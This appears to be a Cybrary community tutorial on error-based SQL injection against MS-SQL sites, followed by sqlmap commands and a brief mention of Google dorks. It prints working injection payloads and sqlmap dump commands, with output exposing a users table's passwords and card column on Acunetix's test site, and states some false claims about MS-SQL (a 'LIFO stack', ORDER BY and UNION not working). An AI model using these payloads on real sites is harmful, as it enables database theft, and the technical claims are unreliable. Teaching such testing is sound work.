Error Based Injection

January 18, 2018 | Views: 4409

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Error Based Injection

Error based injection mainly concentrated on Hacking Microsoft powered technologies like asp and aspx. Error based injection works on MS-SQL database and is bit different from the previous attack that is Union Based injection deployed on My-SQL database.

• Here Database will be Ms-Sql




MS-SQL :  .asp or .aspx


Difference between Union and Error Based Injection.

1.  Extracting all Tables at one time from database

•  Information_schema.tables will not return you the entire table names.


2.   MS SQL works on STACK principal means LAST IN FIRST OUT.

• Hence the table which is on the top of the stack is going to be fetched first at the time of extraction for the same.


3.  Functions like database() , version() does not works in MS-SQL.


4.  “order by” or “union” does not works on MsSql




• It is a legal platform being provided by Acunetix for Security Testing


Step 1: Get any GET method in the URL of the website.

• We have to look for any Somethoing=Something.

• Eg. Id=1 or pid=16 or product=milk


Step 2: Check the exception handling.′


Step 3: Check the conditions required for further attack. and 1=0;


Note : Error Based Injection works on LIFO rule. Last in First out.


For Example: If we have a database with tables like followings

threads -> 1






Step 4: and

1=convert(int,(select top 1 table_name from information_schema.tables));

• Got Table :  ‘threads’ X and

1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘threads’)));

• Target : ‘users’


Step 5: Get the respective columns of the users table and

1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’users’ and column_name not in (‘uname’)));

• Target Column : uname, upass


Step 6: Get the uname and upass and

1=convert(int,(select top 1 upass from users));

• uname:admin

• upass: none


Stack Based Query


1.   SQLMAP : its a python script based automated vulnerability assessment and penetration testing tool.

2.   Kali Linux : SQLmap is inbuild in Kali Linux

• You can also download the sqlmap version for windows from its official website.


Introduction to SQL MAP


Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Step 1: Open Your Linux Terminal

Step 2: python sqlmap -u –dbs


Here We can see we got these below databases.

[09:54:16] [INFO] fetching database names

Available databases [2]:

[*] acuart <——- Target Database

[*] information_schema

Step 3: Get the tables of the database

python sqlmap -u -D acuart –tables

Here We got all the tables available in the acuart database


[09:58:49] [INFO] fetching tables for database: ‘acuart’

Database: acuart

[8 tables]


| artists   |

| carts     |

| categ     |

| featured  |

| guestbook |

| pictures  |

| products  |

| users     |——-> Target Table






Step 4: Get the columns of the users table

python sqlmap -u -T users –columns


Database: acuart

Table: users

[8 columns]


| Column  | Type         |


| address | mediumtext   |

| cart    | varchar(100) |

| cc      | varchar(100) |

| email   | varchar(100) |

| name    | varchar(100) |

| pass    | varchar(100) |—> Target

| phone   | varchar(100) |

| uname   | varchar(100) |—> Target


Step 5: Get the data from the columns of the above table.

python sqlmap -u -U test -T users –dump


Database: acuart

Table: users

[1 entry]


| cc                        | name         | cart                             | pass | uname | phone   | email              | address |


| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | | foda-se |



Google Hacking Database

Johny i Hack Stuff : Searched –> Google –> Credit Cards

• Google Dorks

Filteration of results from google database.

#inurl  — Green Line in Google Search

#intitle – Blue Line in Google Search

#intext – Black Line in Google Seach

#filetype – Type of file that we needed i.e. pdf, ppt, docs etc


Searching tools

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
1 Comment
  1. guy is very vague in his steps. would be really helpful if u took your time and when through the steps instead of assuming the user knows what you’re doing. It won’t hurt the experienced users but it sure will help the novice ones.

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge



We recommend always using caution when following any link

Are you sure you want to continue?